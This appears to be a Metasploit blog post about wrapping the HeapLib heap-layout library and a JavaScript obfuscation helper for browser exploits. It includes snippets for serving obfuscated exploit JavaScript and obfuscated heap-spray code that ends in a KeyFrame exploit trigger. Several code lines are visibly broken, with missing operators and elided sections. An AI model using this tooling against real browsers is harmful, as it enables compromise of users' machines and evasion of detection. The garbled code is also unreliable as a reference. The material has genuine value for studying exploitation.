Last updated at Fri, 12 Jan 2024 01:22:30 GMT

If you were able to attend Black Hat Europe this year, you had the opportunity to catch Alexander Sotirov's talk on Heap Feng Shui. The focus of his talk was on describing ways to use javascript in browsers to control heap layout with surgical precision.  This has obvious benefits when it comes to exploiting heap related vulnerabilities in browsers.  At present, many browser-based exploits will blindly spray payloads and other structures across the heap in ways that won't always guarantee that they succeed.  To help improve this situation, Alex introduced a javascript library called HeapLib that provides more granular control of the heap.

Given the usefulness of this library, we've taken the HeapLib javascript and created some wrappers in Metasploit for interacting with it.  Browser-based exploits written in Metasploit 3 may now take advantage the features offered by HeapLib.  It's pretty easy to use:


js = heaplib(
  "// js code that uses heaplib goes here\n"
  "var xyz;\n"
  "var abc;\n"
  "...")

send_response(cli, "<script>#{js}</script>")

We've also included some generic code for doing very basic javascript obfuscation:


js = obfuscate_js(js,
  'Symbols' =>
     {
         'Variables' => [ 'xyz', 'abc' ]
     })

The javascript obfuscation currently amounts to a global substitution of variables, methods, classes, and namespaces.  This is pretty basic, and it will most definitely be extended in the future.  If all goes well, these improvements will automatically apply to browser-based exploits that use obfsucate_js.  This obfuscation is also applied to the HeapLib code itself.  If you pull up a page that uses it, you'll see something like:


function kgbItQgjwkTsYnvA() {
}
kgbItQgjwkTsYnvA.XK = function(maxAlloc, XPcAqRwEPAZhnqNytABase) {
    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
    this.XPcAqRwEPAZhnqNytABase = (XPcAqRwEPAZhnqNytABase ? XPcAqRwEPAZhnqNytABase : 0x150000);
        this.NEaCrNWavzlCx = "AAAA";
    while (4 this.NEaCrNWavzlCx.length*2 2 < this.maxAlloc) {
        this.NEaCrNWavzlCx = this.NEaCrNWavzlCx;
...
XPcAqRwEPAZhnqNytA.pzMvSBZ();
for (var i = 0; i < 100; i )
  XPcAqRwEPAZhnqNytA.ebGXqe(MNaLfxJWihIGQAqPSokXf)
XPcAqRwEPAZhnqNytA.bNYYOglF(MNaLfxJWihIGQAqPSokXf);
for (var i = 0; i < 100; i )
  XPcAqRwEPAZhnqNytA.ebGXqe(0x2010)
XPcAqRwEPAZhnqNytA.fuuakTBEnTmfWlFMio(ZCPd, 2);
nBnqLM.KeyFrame(0x40000801, new Array(1), new Array(1));
delete XPcAqRwEPAZhnqNytA;

To give a real example of using HeapLib in Metasploit, we've ported Alex's KeyFrame exploit.  Comparing the two exploits together should show that the amount of code needed to use HeapLib in Metasploit is very minimal.  The javascript is taken verbatim from Alex's exploit (with the exception of comments and debug messages).  Learn more about our Metasploit documentation here.